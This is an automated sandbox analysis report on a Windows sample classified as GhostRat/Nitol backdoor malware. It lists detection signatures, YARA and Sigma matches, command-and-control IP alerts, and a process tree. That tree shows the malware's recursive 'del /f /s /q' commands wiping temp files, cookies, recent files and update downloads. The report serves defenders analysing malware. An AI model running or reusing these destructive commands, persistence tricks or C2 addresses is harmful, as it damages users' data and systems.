Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name:G3izWAY3Fa.exe
renamed because original name is a hash value
Original sample name:118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID:1579781
MD5:118f7f61b6afb1da5e94ea1740222c73
SHA1:5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags:exeGh0stRATuser-abuse_ch
Infos:

Detection

GhostRat, Nitol
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contain functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to enumerate network shares of other devices
Deletes itself after installation
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Sigma detected: Files With System Process Name In Unsuspected Locations
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • G3izWAY3Fa.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\G3izWAY3Fa.exe" MD5: 118F7F61B6AFB1DA5E94EA1740222C73)
    • v5.exe (PID: 7460 cmdline: "C:\Windows\temp\v5.exe" MD5: 48A02F4A003E8CBE683CF5DADA237168)
      • cmd.exe (PID: 7596 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • server.exe (PID: 7472 cmdline: "C:\Windows\temp\server.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)
      • svchost.exe (PID: 7844 cmdline: "C:\Windows\system32\033726\svchost.exe" MD5: 00C090DAE3EE360E575655FE89121D83)
        • svchost.exe (PID: 8032 cmdline: "C:\Windows\system32\034031\svchost.exe" MD5: B573CCA4145727C22E1AD6774DBF3705)
    • .exe (PID: 7512 cmdline: "C:\Windows\temp\ .exe" MD5: CCEE0912E79D434F0D2C1E11274F23C0)
      • cmd.exe (PID: 2832 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6944 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2156 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6424 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7584 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1080 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 652 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3892 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2992 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3896 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3336 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1008 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5216 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6836 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3848 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4452 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • v5.exe (PID: 7484 cmdline: C:\Windows\temp\v5.exe MD5: 48A02F4A003E8CBE683CF5DADA237168)
  • svchsot.exe (PID: 8104 cmdline: "C:\Windows\XXXXXX05CA35CC\svchsot.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)
  • svchsot.exe (PID: 4848 cmdline: "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe" MD5: 00C090DAE3EE360E575655FE89121D83)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GhostRatYara detected GhostRatJoe Security
    dump.pcapgh0stunknownhttps://github.com/jackcr/
    • 0x3d4ef:$a: 47 68 30 73 74 A6 00 00 00 18 01 00 00 78 9C
    • 0x3d972:$a: 47 68 30 73 74 16 00 00 00 01 00 00 00 78 9C
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_NitolYara detected NitolJoe Security
          0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
            00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              2.2.v5.exe.400000.0.unpackJoeSecurity_NitolYara detected NitolJoe Security
                2.2.v5.exe.400000.0.unpackBackdoor_Nitol_Jun17Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre DownloaderFlorian Roth
                • 0x1e13:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x1eb0:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x203b:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
                • 0x21a3:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
                • 0x1b60:$s2: %c%c%c%c%c%c.exe
                • 0x2003:$s5: Accept-Language: zh-cn
                • 0x216b:$s5: Accept-Language: zh-cn
                • 0x22cf:$s5: Accept-Language: zh-cn
                2.2.v5.exe.400000.0.unpackZxShell_Related_Malware_CN_Group_Jul17_2Detects a ZxShell related sample from a CN threat groupFlorian Roth
                • 0x1e13:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x1eb0:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x203b:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
                • 0x21a3:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
                • 0x1cf0:$u3: User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
                • 0x2307:$u4: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                • 0x172c:$x1: \\%s\admin$\g1fd.exe
                • 0x1764:$x2: C:\g1fd.exe
                • 0x174c:$x3: \\%s\C$\NewArean.exe
                • 0x17d0:$s0: at \\%s %d:%d %s
                • 0x19f0:$s1: %c%c%c%c%ccn.exe
                • 0x1a58:$s1: %c%c%c%c%ccn.exe
                • 0x1ad4:$s1: %c%c%c%c%ccn.exe
                • 0x1970:$s2: hra%u.dll
                • 0x1b20:$s2: hra%u.dll
                • 0x1b54:$s2: hra%u.dll
                • 0x1d61:$s3: Referer: http://%s:80/http://%s
                • 0x2003:$s5: Accept-Language: zh-cn
                • 0x216b:$s5: Accept-Language: zh-cn
                • 0x22cf:$s5: Accept-Language: zh-cn
                2.2.v5.exe.400000.0.unpackCN_disclosed_20180208_Mal1Detects malware from disclosed CN malware setFlorian Roth
                • 0x2307:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                2.2.v5.exe.400000.0.unpackMAL_Nitol_Malware_Jan19_1Detects Nitol MalwareFlorian Roth
                • 0x239c:$xc2: GET ^&&%$%$^
                • 0x23cd:$xc2: GET ^&&%$%$^
                • 0x23fe:$xc2: GET ^&&%$%$^
                • 0x242f:$xc2: GET ^&&%$%$^
                • 0x2460:$xc2: GET ^&&%$%$^
                • 0x2491:$xc2: GET ^&&%$%$^
                • 0x24c2:$xc2: GET ^&&%$%$^
                • 0x24f3:$xc2: GET ^&&%$%$^
                • 0x2524:$xc2: GET ^&&%$%$^
                • 0x2555:$xc2: GET ^&&%$%$^
                • 0x2586:$xc2: GET ^&&%$%$^
                • 0x25b7:$xc2: GET ^&&%$%$^
                • 0x25e8:$xc2: GET ^&&%$%$^
                • 0x2619:$xc2: GET ^&&%$%$^
                • 0x264a:$xc2: GET ^&&%$%$^
                • 0x267b:$xc2: GET ^&&%$%$^
                • 0x26ac:$xc2: GET ^&&%$%$^
                • 0x26dd:$xc2: GET ^&&%$%$^
                • 0x270e:$xc2: GET ^&&%$%$^
                • 0x273f:$xc2: GET ^&&%$%$^
                • 0x23c9:$n1: .htmGET
                Click to see the 5 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\temp\ .exe" , CommandLine: "C:\Windows\temp\ .exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Temp\ .exe, NewProcessName: C:\Windows\Temp\ .exe, OriginalFileName: C:\Windows\Temp\ .exe, ParentCommandLine: "C:\Users\user\Desktop\G3izWAY3Fa.exe", ParentImage: C:\Users\user\Desktop\G3izWAY3Fa.exe, ParentProcessId: 7380, ParentProcessName: G3izWAY3Fa.exe, ProcessCommandLine: "C:\Windows\temp\ .exe" , ProcessId: 7512, ProcessName: .exe
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Temp\server.exe, ProcessId: 7472, TargetFilename: C:\Windows\SysWOW64\033726\svchost.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 120.48.34.233, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Windows\Temp\v5.exe, Initiated: true, ProcessId: 7484, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49713
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\033726\svchost.exe" , CommandLine: "C:\Windows\system32\033726\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\033726\svchost.exe, NewProcessName: C:\Windows\SysWOW64\033726\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\033726\svchost.exe, ParentCommandLine: "C:\Windows\temp\server.exe" , ParentImage: C:\Windows\Temp\server.exe, ParentProcessId: 7472, ParentProcessName: server.exe, ProcessCommandLine: "C:\Windows\system32\033726\svchost.exe" , ProcessId: 7844, ProcessName: svchost.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\XXXXXX05CA35CC\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Temp\server.exe, ProcessId: 7472, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX05CA35CC
                Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\033726\svchost.exe" , CommandLine: "C:\Windows\system32\033726\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\033726\svchost.exe, NewProcessName: C:\Windows\SysWOW64\033726\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\033726\svchost.exe, ParentCommandLine: "C:\Windows\temp\server.exe" , ParentImage: C:\Windows\Temp\server.exe, ParentProcessId: 7472, ParentProcessName: server.exe, ProcessCommandLine: "C:\Windows\system32\033726\svchost.exe" , ProcessId: 7844, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:27.972349+010020169221Malware Command and Control Activity Detected192.168.2.949707120.48.34.2338000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:27.972349+010020132141Malware Command and Control Activity Detected192.168.2.949707120.48.34.2338000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:28.949435+010020484781A Network Trojan was detected120.48.34.2338000192.168.2.949707TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:28.392042+010020251351Malware Command and Control Activity Detected192.168.2.949713120.48.34.2338080TCP
                2024-12-23T09:01:30.624146+010020251351Malware Command and Control Activity Detected192.168.2.9497208.7.198.468090TCP
                2024-12-23T09:01:50.831677+010020251351Malware Command and Control Activity Detected192.168.2.949767120.48.34.2338080TCP
                2024-12-23T09:01:53.205437+010020251351Malware Command and Control Activity Detected192.168.2.9497748.7.198.468090TCP
                2024-12-23T09:02:13.473112+010020251351Malware Command and Control Activity Detected192.168.2.949814120.48.34.2338080TCP
                2024-12-23T09:02:15.979966+010020251351Malware Command and Control Activity Detected192.168.2.9498208.7.198.468090TCP
                2024-12-23T09:02:35.999010+010020251351Malware Command and Control Activity Detected192.168.2.949857120.48.34.2338080TCP
                2024-12-23T09:02:39.320654+010020251351Malware Command and Control Activity Detected192.168.2.94986546.82.174.698090TCP
                2024-12-23T09:02:58.388861+010020251351Malware Command and Control Activity Detected192.168.2.949901120.48.34.2338080TCP
                2024-12-23T09:03:01.971236+010020251351Malware Command and Control Activity Detected192.168.2.94991246.82.174.698090TCP
                2024-12-23T09:03:21.114463+010020251351Malware Command and Control Activity Detected192.168.2.949945120.48.34.2338080TCP
                2024-12-23T09:03:27.358663+010020251351Malware Command and Control Activity Detected192.168.2.94995646.82.174.698090TCP
                2024-12-23T09:03:43.593518+010020251351Malware Command and Control Activity Detected192.168.2.949989120.48.34.2338080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:28.949435+010028088141Malware Command and Control Activity Detected120.48.34.2338000192.168.2.949707TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949767120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949857120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949901120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.94995646.82.174.698090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.94986546.82.174.698090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949713120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.9498208.7.198.468090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949989120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.94991246.82.174.698090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.9497208.7.198.468090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.9497748.7.198.468090TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949945120.48.34.2338080TCP
                2024-12-23T09:01:20.628261+010028075501Malware Command and Control Activity Detected192.168.2.949814120.48.34.2338080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: G3izWAY3Fa.exeAvira: detected
                Source: C:\Windows\SysWOW64\033726\svchost.exeAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\SysWOW64\034031\svchost.exeAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeAvira: detection malicious, Label: BDS/Zegost.birna
